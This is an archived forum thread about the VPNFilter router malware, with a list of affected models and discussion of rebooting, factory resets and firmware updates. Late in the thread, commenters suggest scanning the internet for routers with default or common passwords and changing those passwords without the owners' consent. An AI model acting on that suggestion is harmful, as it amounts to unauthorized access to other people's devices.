Unplug it. Count to 10. Plug it back in.
May 30, 2018 2:20 PM   Subscribe

 
Symantec's FAQ has a list of known affected routers:
Linksys E1200
Linksys E2500
Linksys WRVS4400N
Mikrotik RouterOS for Cloud Core Routers: Versions 1016, 1036, and 1072
Netgear DGN2200
Netgear R6400
Netgear R7000
Netgear R8000
Netgear WNR1000
Netgear WNR2000
QNAP TS251
QNAP TS439 Pro
Other QNAP NAS devices running QTS software
TP-Link R600VPN
Note that the article mentions that rebooting doesn't fully remove this malware. The recommended remedy is to take note of all your router settings and then follow the steps to restore the router to factory firmware. Then update the firmware if available before putting all your configuration back in (with admin different passwords, natch). And disable any remote management you may have enabled.

This is a huge pain in the ass, but the only way to completely remove it.
posted by JoeZydeco at 2:31 PM on May 30, 2018 [8 favorites]


Already on top of that! (Thanks to a 3 hour power outage yesterday...)
posted by caution live frogs at 2:31 PM on May 30, 2018 [2 favorites]


Will also note that the list above is the list of routers KNOWN to be affected. Who knows if others are also affected. Who knows what other unknown malware is memory-resident in other routers.

It is not a bad idea to reboot whatever router you use, even if it is not on the list.
posted by caution live frogs at 2:34 PM on May 30, 2018 [4 favorites]


Will this get us the election back?
posted by Abehammerb Lincoln at 2:48 PM on May 30, 2018 [32 favorites]


Abehammerb Lincoln: "Will this get us the election back?"

Have you tried unplugging your country and plugging it back in?
posted by octothorpe at 3:51 PM on May 30, 2018 [81 favorites]


Can we just blackhole all of Russia and go back to normal life?
posted by qxntpqbbbqxl at 4:35 PM on May 30, 2018 [4 favorites]


Without an upgrade (that may not exist yet) they'll be reinfected in days if not hours.
posted by sammyo at 4:39 PM on May 30, 2018 [4 favorites]


I was going to use this as an excuse to switch my router to use OpenWRT, but it seems they don't have any information whether their firmware is also vulnerable either. So I guess I'll reboot my router and do.. nothing.
posted by meowzilla at 5:10 PM on May 30, 2018 [1 favorite]


Without an upgrade (that may not exist yet) they'll be reinfected in days if not hours.

The article states that the FBI has gained control of the IP addresses used in the malware's initial boot-up stage. This both prevents the infection from progressing into its later stages (because the malware won't be able to download the code it needs for that) and allows the FBI to gather information on the malware itself by inspecting the "phone home" package contents.
posted by tobascodagama at 5:12 PM on May 30, 2018 [6 favorites]


As far as I can tell, those of us using a cablemodem with integrated wifi can reset it, but these devices are managed by the ISP, so it is not necessary.
posted by theora55 at 5:15 PM on May 30, 2018 [1 favorite]


What does Stan Beeman say?
posted by lagomorphius at 5:16 PM on May 30, 2018 [6 favorites]


The article states that the FBI has gained control of the IP addresses used in the malware's initial boot-up stage. This both prevents the infection from progressing into its later stages

The latter doesn't necessarily follow from the former.
posted by snuffleupagus at 5:30 PM on May 30, 2018 [2 favorites]


oh god i can't even take this fucking shit on top of every other fucking shit thing today
posted by jenfullmoon at 6:13 PM on May 30, 2018 [13 favorites]


Would a brief power outage have effectively rebooted my router?
posted by peppermind at 6:13 PM on May 30, 2018


The latter doesn't necessarily follow from the former.

I mean, basically this amounts to "I don't trust the FBI", since they're the source for all of this. Which is a valid stance, but one that should probably be stated explicitly rather than via insinuation.
posted by tobascodagama at 6:39 PM on May 30, 2018 [4 favorites]


FBI is a little too specific, but OK -- just because the FBI has seized control of the command and control IPs doesn't mean that some agency won't try to make hay while the sun shines and install their own backdoors. Which wouldn't make it into the press release.

We know the government tries to do this. It's not a secret. (Anymore.)
posted by snuffleupagus at 6:58 PM on May 30, 2018


I would still probably do it if I had a vulnerable router. Or, toss it and buy something else. But, this doesn't give me the warm and fuzzies.
posted by snuffleupagus at 7:00 PM on May 30, 2018 [1 favorite]


Huh. I had a power outage today as well.... I wonder if it was planned to address just this problem.
posted by xammerboy at 7:28 PM on May 30, 2018


I can't RTFA - I have no internet. :(
posted by bendy at 10:45 PM on May 30, 2018 [1 favorite]


Ironically, something associated with that article froze my browser.

I've done the restart thing since that is easy, but I'm dreading the process of finding passwords and navigating the firmware process.
posted by Dip Flash at 10:59 PM on May 30, 2018 [1 favorite]


Err, any other netjunkies out there notice some odd hiccups and weather today? I was working remotely and found WiFi at a number of small commercial venues handing out lower layer wifi but no DNS/HTTP.

Related?
posted by loquacious at 2:05 AM on May 31, 2018


I was going to use this as an excuse to switch my router to use OpenWRT, but it seems they don't have any information whether their firmware is also vulnerable either. So I guess I'll reboot my router and do.. nothing.

According to Wikipedia the VPNFilter malware uses default credentials on the routers to gain initial access. OpenWRT isn't vulnerable because it forces you to set a password on first use (IIRC). Of course, if you set that password to "" then the joke’s on you...

The latter doesn't necessarily follow from the former.

It does in this case, because the persistent part of VPNFilter is just a loader for the rest of it.

FBI is a little too specific, but OK -- just because the FBI has seized control of the command and control IPs doesn't mean that some agency won't try to make hay while the sun shines and install their own backdoors. Which wouldn't make it into the press release.

Sure, but that doesn't mean that it isn't good internet hygiene to wipe out this particular piece of malware.
posted by pharm at 2:33 AM on May 31, 2018 [4 favorites]


So if my router is a piece of consumer trash that overheats under the strain of doing nothing at all, and consequently reboots itself every few hours, that's good for the future of democracy?

I was promised jetpacks godammit. This is hardly an acceptable substitute.
posted by Western Infidels at 7:05 AM on May 31, 2018 [3 favorites]


I made the "reinfection" quip without any research and generally stand by it but REBOOT YOUR ROUTERS, also check if an upgrade is available and install the upgrade, it's generally a 10 minute process.

My base point that I failed to detail was not that the virus would reinstall itself immediately but more that whoever made the initial attack has the IP of the router and can re-use a variation on the original attack.
posted by sammyo at 7:09 AM on May 31, 2018 [1 favorite]


Don't most routers allow you to save down a config file, which you can upload and reinstall after the factory reset? Will that reinfect the device?
posted by stupidsexyFlanders at 8:59 AM on May 31, 2018


Sometimes I think it would be an act of mercy to write a scanner that hunts through IP address ranges for routers with default access, and then sets them to random passwords. Most of the time nobody will ever notice, and if the time comes when the punter needs to change settings, they'll just have to do a factory reset first. Stop this sort of nonsense in its tracks.
posted by Devonian at 9:13 AM on May 31, 2018 [1 favorite]


I was unplugged last night. But I feel better now.
posted by mule98J at 10:07 AM on May 31, 2018


This is a Washington Post link, for any non subscribers who are concerned about using up a click.
posted by Guy Smiley at 12:49 PM on May 31, 2018


stupidsexyFlanders, that config file will probably include the scheduled job to reload the malware —and so that’s exactly why SANS recommends a factory reset before the upgrading to the newest available firmware.
posted by wenestvedt at 4:34 AM on June 1, 2018


Devonian: That would probably not be a bad idea. Especially since I would bet that a large percentage of the routers that are being reset are just going to be left at their factory settings, by users who reboot (or even factory reset) them, and then declare victory as soon as they can get to the Internet from their laptop without securing anything.

I presume that the updated firmware for the affected models now requires a password on first use, but most of those passwords will probably be crap too. People are absolutely shit at making up passwords if they don't expect to have to do it, or don't understand the benefit—I've watched people go through a heuristic that's basically: (1) try leaving it blank, (2) if that doesn't work, try "password", (3) if that doesn't work, try whatever password they use for the rest of their shit, which 90% of the time seems to be somebody's birthday in one format or another.

So if someone were going to be the hero we need but don't deserve, they might as well look not only for the default credentials but also at least try the top 10 most common passwords while they're at it.
posted by Kadin2048 at 7:15 AM on June 1, 2018 [1 favorite]


« Older it's the buff cat   |   I scream, you scream, we all scream for WiFi Newer »


This thread has been archived and is closed to new comments